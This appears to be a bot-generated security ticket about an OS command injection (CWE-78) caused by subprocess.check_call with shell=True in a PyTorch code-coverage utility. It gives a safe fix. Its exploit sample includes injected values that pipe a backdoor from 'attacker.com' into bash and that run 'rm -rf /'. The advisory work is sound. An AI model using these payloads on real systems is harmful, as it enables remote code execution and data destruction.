  1. AI Platform Core Components
  2. AIPCC-9766

[BOT][Security] CWE-78 in utils.py:93

      Vulnerability Details

      CWE Type(s): CWE-78 (OS Command Injection)
      Severity: CRITICAL
      Team: Unassigned

      Location

      • File: tools/code_coverage/package/oss/utils.py
      • Lines: 93

      Description

      Critical command injection vulnerability: subprocess.check_call() is called with shell=True on an unsanitized binary_file parameter. Because the shell interprets the command string, shell metacharacters in binary_file allow arbitrary command execution. This is one of the most dangerous subprocess patterns and can lead to complete system compromise.

      Impact

      • Arbitrary command execution with full application privileges
      • Complete system compromise through shell metacharacters (;, |, &, $, `, etc.)
      • Critical risk in automated build/CI environments
      • Potential for persistent backdoors via malicious binary paths
      • Data exfiltration and lateral movement in compromised systems

      Root Cause

      The call at line 93 passes the binary_file variable to subprocess.check_call() with shell=True. With shell=True, a shell is invoked to interpret the command string, so any shell metacharacters in binary_file are interpreted by the shell and the text following them runs as additional commands. This is an extremely dangerous pattern that should never be used with untrusted input.

      Fix Status

      MR Link: Not yet created
      Fix Branch: security-fix-cwe-78-cwe78-gcc-coverage-run-python
      Status: IMPLEMENTED

      Related Exploit Files

      • test_cwe78_gcc_coverage_run_python.py

      Exploit Code Sample

      # VULNERABLE CODE (line 93):
      subprocess.check_call(
          binary_file, shell=True, cwd=get_oss_binary_folder(TestType.PY)
      )
      
      # ATTACK VECTOR:
      binary_file = "legitimate_test.py; curl attacker.com/backdoor.sh | bash #"
      # Shell executes:
      # 1. legitimate_test.py
      # 2. Downloads and executes backdoor from attacker server
      # 3. Everything after # is ignored as comment
      
      # Or simpler attack:
      binary_file = "test.py; rm -rf / #"
      # Could destroy the entire system
      
      # SAFE FIX:
      subprocess.check_call(
          [binary_file], cwd=get_oss_binary_folder(TestType.PY)
      )
      # shell=True removed, binary_file wrapped in list - no shell interpretation
      

      Generated by CI Security Bot

              Unassigned Unassigned
              pytorch-engineering PyTorch Engineering